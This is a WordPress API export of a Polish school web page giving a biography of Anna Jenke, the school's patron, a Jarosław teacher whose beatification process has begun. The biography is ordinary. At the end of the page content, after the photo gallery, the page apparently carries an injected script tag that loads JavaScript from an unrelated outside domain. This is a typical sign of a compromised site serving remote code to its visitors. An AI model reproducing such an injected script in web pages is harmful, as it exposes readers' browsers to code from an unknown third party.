{"id":10,"date":"2015-12-15T13:19:28","date_gmt":"2015-12-15T12:19:28","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=10"},"modified":"2020-04-23T09:21:44","modified_gmt":"2020-04-23T07:21:44","slug":"patron","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/patron\/","title":{"rendered":"Patron"},"content":{"rendered":"<h2 style=\"text-align: center;\"><span style=\"color: #000080;\"><strong>&#8222;Dzieci &#8211; oto pierwsza i najwa\u017cniejsza troska naszych czas\u00f3w&#8221;<\/strong><\/span><\/h2>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\" align=\"right\"><span style=\"color: #ff0000;\"><em><img loading=\"lazy\" class=\"size-medium wp-image-395 alignleft\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/patron-238x300.jpg\" alt=\"patron\" width=\"238\" height=\"300\" srcset=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/patron-238x300.jpg 238w, http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/patron-768x969.jpg 768w, http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/patron-811x1024.jpg 811w, http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/patron.jpg 1030w\" sizes=\"(max-width: 238px) 100vw, 238px\" \/>&#8222;M\u0142odzie\u017c ma nam tylko przechodzi\u0107 przez r\u0119ce. Trzeba j\u0105 umie\u0107 poda\u0107 Wy\u017cej&#8230; i Dalej&#8230; &#8222;<\/em><\/span><\/p>\n<p style=\"text-align: justify;\" align=\"right\"><strong>\u00a0<\/strong><\/p>\n<p style=\"text-align: justify;\" align=\"justify\"><strong>\u00a0\u00a0\u00a0 <\/strong>Anna Jenke urodzi\u0142a si\u0119 3 IV 1921 roku w B\u0142a\u017cowej ko\u0142o Rzeszowa. Od 7-ego roku \u017cycia wraz z rodzicami na sta\u0142e zamieszka\u0142a w Jaros\u0142awiu. Szko\u0142\u0119 \u015bredni\u0105 uko\u0144czy\u0142a u SS. Niepokalanek w Jaros\u0142awiu w 1939 roku. W czasie wojny i okupacji by\u0142a czynnie zaanga\u017cowana w konspiracji; nios\u0142a pomoc je\u0144com wojennym, wi\u0119\u017aniom, a dla biednych dzieci zorganizowa\u0142a akcj\u0119 &#8222;kromka chleba&#8221;. Bra\u0142a te\u017c udzia\u0142 w tajnym nauczaniu.<\/p>\n<p align=\"right\"><strong>\u00a0<\/strong><\/p>\n<p style=\"text-align: justify;\">W 1945 roku rozpocz\u0119\u0142a studia na Uniwersytecie Jagiello\u0144skim, kt\u00f3re uko\u0144czy\u0142a w 1950 roku, uzyskuj\u0105c stopie\u0144 magistra z filologii polskiej. Od 1950 roku do ko\u0144ca \u017cycia pracowa\u0142a jako polonistka i wychowawczyni m\u0142odzie\u017cy szk\u00f3\u0142 \u015brednich w Jaros\u0142awiu. Jej praca pedagogiczna i wychowawcza przebiega\u0142a w bardzo trudnym okresie &#8211; w systemie komunistycznym. Wtedy to Anna wykaza\u0142a wielk\u0105 odwag\u0119 w wyznawaniu prawd wiary, swej przynale\u017cno\u015bci do Chrystusa i Ko\u015bcio\u0142a. W tym te\u017c duchu wychowywa\u0142a ca\u0142e rzesze m\u0142odych pokole\u0144. Szczeg\u00f3ln\u0105 trosk\u0105 otacza\u0142a zaniedban\u0105 m\u0142odzie\u017c i &#8222;dzieci ulicy&#8221;. Opiekowa\u0142a si\u0119 te\u017c chorymi, biednymi i samotnymi lud\u017ami. Wszystkim nios\u0142a pomoc moraln\u0105 i materialn\u0105. Odznacza\u0142a si\u0119 g\u0142\u0119bok\u0105 wiar\u0105 i nieprzeci\u0119tn\u0105 mi\u0142o\u015bci\u0105 Boga i bli\u017aniego. Na codzie\u0144 \u017cy\u0142a Ewangeli\u0105. Przez to sta\u0142a si\u0119 autentycznym \u015bwiadkiem Chrystusa &#8211; wsp\u00f3\u0142czesnym \u015bwieckim aposto\u0142em.<\/p>\n<p style=\"text-align: justify;\"><span class=\"style1\">Zmar\u0142a w Jaros\u0142awiu 15 II 1976 roku, trawiona ci\u0119\u017ck\u0105 chorob\u0105 nowotworow\u0105. Pogrzeb, kt\u00f3ry zgromadzi\u0142 wielkie t\u0142umy ludzi przypomina\u0142 manifestacj\u0119. Uczestnicy tego smutnego obrz\u0119du przybyli odda\u0107 ho\u0142d cz\u0142owiekowi wielkiemu, nieprzeci\u0119tnemu. Pragn\u0119li wyrazi\u0107 swoj\u0105 wdzi\u0119czno\u015b\u0107 za jej wprost heroiczn\u0105 mi\u0142o\u015b\u0107 Boga i drugiego cz\u0142owieka. Uczniowie i wychowankowie szczeg\u00f3lnie prze\u017cywali odej\u015bcie swojej wspania\u0142ej wychowawczyni, przyjaciela, bowiem za tak\u0105 j\u0105 uwa\u017cali. Dla swego niezwyk\u0142ego \u017cycia pe\u0142nego dobroci i mi\u0142o\u015bci, zas\u0142u\u017cy\u0142a sobie u wielu na wdzi\u0119czn\u0105 pami\u0119\u0107.<\/span><\/p>\n<p style=\"text-align: justify;\">Ko\u015bci\u00f3\u0142 archidiecezji przemyskiej, bior\u0105c pod uwag\u0119 jej wielkie warto\u015bci ducha; \u017cycie wed\u0142ug cn\u00f3t chrze\u015bcija\u0144skich, wierne na\u015bladowanie Chrystusa na ewangelicznej drodze &#8211; rozpocz\u0105\u0142 proces beatyfikacyjny. I odt\u0105d przys\u0142uguje jej tytu\u0142 S\u0142u\u017cebnicy Bo\u017cej.<\/p>\n<p>Tymczasem pami\u0119\u0107 o niej jest wci\u0105\u017c \u017cywa. Ludzie w modlitwach prywatnych coraz cz\u0119\u015bciej zwracaj\u0105 si\u0119 do niej z pro\u015bb\u0105 o wstawiennictwo u Boga w r\u00f3\u017cnych potrzebach. I s\u0105 wys\u0142uchiwani, o czym \u015bwiadcz\u0105 liczne pisemne podzi\u0119kowania przesy\u0142ane do Towarzystwa Przyjaci\u00f3\u0142 Anny Jenke w Jaros\u0142awiu oraz wpisywane do Ksi\u0119gi Pami\u0105tkowej znajduj\u0105cej si\u0119 w krypcie ko\u015bcio\u0142a \u015bw. Miko\u0142aja w Jaros\u0142awiu, gdzie spoczywaj\u0105 jej doczesne szcz\u0105tki.<\/p>\n<p>Znajomo\u015b\u0107 tej Postaci rozszerza si\u0119 coraz bardziej przez \u015bwiadectwa os\u00f3b, kt\u00f3re j\u0105 zna\u0142y i przez liczne publikacje w postaci ksi\u0105\u017cek i artyku\u0142\u00f3w.<\/p>\n<p>&nbsp;<\/p>\n<h6 align=\"right\"><em>\u017ar\u00f3d\u0142o: &#8222;Z Bogiem i tylko dla Boga<\/em><br \/>\n<em> \u017bycie Ewangeli\u0105<\/em><br \/>\n<em> Sylwetka duchowa Anny Jenke&#8221;<\/em><\/h6>\n<p><div id='gallery-1' class='gallery galleryid-10 gallery-columns-3 gallery-size-thumbnail'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/bernadeta-lipian.jpg\" title=\"bernadeta lipian\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/bernadeta-lipian-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" aria-describedby=\"gallery-1-397\"><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-397'>\n\t\t\t\ts. Bernadeta Lipian &#8211; postulatorka procesu beatyfiacyjnego Anny Jenke\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/patron1.jpg\" title=\"patron1\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/patron1-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" aria-describedby=\"gallery-1-398\"><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-398'>\n\t\t\t\tPortret Anny Jenke      Portret namalowa\u0142 Prof.dr hab. artysta malarz Stanis\u0142aw Bia\u0142og\u0142owicz &#8211; ucze\u0144 patronki szko\u0142y. Reprodukcj\u0119 szko\u0142a otrzyma\u0142a podczas wizyty Andrzeja Krawczyka ( ucznia Pani profesor) w szkole jesieni\u0105 2012 r.\n\t\t\t\t<\/figcaption><\/figure>\n\t\t<\/div>\n<script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&#8222;Dzieci &#8211; oto pierwsza i najwa\u017cniejsza troska naszych czas\u00f3w&#8221; &nbsp; &#8222;M\u0142odzie\u017c ma nam tylko przechodzi\u0107 przez r\u0119ce. Trzeba j\u0105 umie\u0107 poda\u0107 Wy\u017cej&#8230; i Dalej&#8230; &#8222; \u00a0 \u00a0\u00a0\u00a0 Anna Jenke urodzi\u0142a si\u0119 3 IV 1921 roku w B\u0142a\u017cowej ko\u0142o Rzeszowa. Od 7-ego roku \u017cycia wraz z rodzicami na sta\u0142e zamieszka\u0142a w Jaros\u0142awiu. Szko\u0142\u0119 \u015bredni\u0105 uko\u0144czy\u0142a u [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/10"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=10"}],"version-history":[{"count":13,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/10\/revisions"}],"predecessor-version":[{"id":15060,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/10\/revisions\/15060"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=10"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}